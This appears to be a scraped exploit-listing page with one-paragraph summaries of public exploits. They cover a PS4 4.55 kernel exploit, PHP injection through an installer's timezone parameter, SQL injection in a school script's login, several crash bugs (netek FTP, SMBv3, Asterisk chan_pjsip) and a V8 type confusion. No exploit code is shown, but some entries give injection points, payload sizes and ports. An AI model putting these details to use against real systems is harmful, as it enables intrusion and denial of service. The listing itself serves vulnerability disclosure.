This project contains a full implementation of the 'bpf' kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This release however, does not contain any code related to defeating anti-piracy mechanisms or running homebrew. This exploit does include a loader that listens for payloads on port 9020 and will execute them upon receival.
This script attempts to enumerate all comments from a vulnerable Concrete5 CMS. It does this by sending a POST request to the URL specified with a cnvID parameter, which is incremented from the start ID to the end ID. The response is parsed with BeautifulSoup and the username and message are added to the results list.
Arbitrary PHP code can be injected into configuration file (config.php) after installation has been finished. In order to inject PHP code, fresh install and valid database credentials is required. Application will force an installer (usually "www-data" due to web-based installation) to set a write permission (777) to destination directory and related installation file. An attacker will proceed installation process until reach step 4 and inject malicious PHP code into "timezone" parameter. Once PHP code has been injected to "config.php", an attacker will be able to execute OS command by accessing backdoor "config.php" file along with injected parameter which contain OS command value.
An SQL injection vulnerability exists in PHP Scripts Mall School Management Script 3.0.4. An attacker can exploit this vulnerability by entering a malicious SQL query in the Username and Password fields of the parent_login.php page. This will allow the attacker to login as an admin user.
netek 0.8.2 FTP is vulnerable to Denial of Service attack. An attacker can send a crafted payload of 5000 'A' characters and 1000 'B' characters to the default port 30817 to crash the server. This will cause the CPU usage to reach 100%.
This exploit triggers a Blue Screen of Death (BSoD) on the target machine by sending a specially crafted payload to the SMBv3 service. The payload contains a null pointer dereference which causes the system to crash.
A specially crafted SDP message body with an invalid fmtp attribute causes a segmentation fault in asterisk using `chan_pjsip`. Abuse of this vulnerability leads to denial of service in Asterisk when `chan_pjsip` is in use.
A specially crafted SDP message body with an invalid media format description causes a segmentation fault in asterisk using `chan_pjsip`.
A crash occurs when a number of INVITE messages are sent over TCP or TLS and then the connection is suddenly closed. This issue leads to a segmentation fault.
The TranslatedState::MaterializeCapturedObjectAt function does not cache the created objects like 'slot->value_ = object', which can be used to create different objects but sharing the same properties, leading to type confusion. The proof-of-concept code creates two objects with the same properties, but they are not equal. Changing the property of one object affects the other object, demonstrating type confusion.
Services By CQR